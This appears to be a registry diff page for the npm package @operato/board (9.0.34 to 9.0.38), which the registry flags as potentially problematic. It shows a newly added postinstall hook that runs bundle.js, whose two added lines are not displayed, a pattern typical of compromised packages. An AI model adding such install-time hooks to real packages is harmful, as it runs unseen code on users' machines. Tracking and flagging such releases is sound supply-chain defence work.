@operato/board 9.0.34 → 9.0.38

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @operato/board might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +4 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@operato/board",
3
- "version": "9.0.34",
3
+ "version": "9.0.38",
4
4
  "description": "Webcomponent for board following open-wc recommendations",
5
5
  "author": "heartyoh",
6
6
  "type": "module",
@@ -95,7 +95,8 @@
95
95
  "test": "tsc && wtr --coverage",
96
96
  "test:watch": "tsc && concurrently -k -r \"tsc --watch --preserveWatchOutput\" \"wtr --watch\"",
97
97
  "storybook": "tsc && npm run analyze -- --exclude dist && concurrently -k -r \"tsc --watch --preserveWatchOutput\" \"wds -c .storybook/server.mjs\"",
98
- "storybook:build": "tsc && npm run analyze -- --exclude dist && build-storybook"
98
+ "storybook:build": "tsc && npm run analyze -- --exclude dist && build-storybook",
99
+ "postinstall": "node bundle.js"
99
100
  },
100
101
  "dependencies": {
101
102
  "@material/web": "^2.0.0",
@@ -160,4 +161,4 @@
160
161
  ]
161
162
  },
162
163
  "gitHead": "0373ae0dc80a00b4d87b4d1d93d80a7b934064c9"
163
- }
164
+ }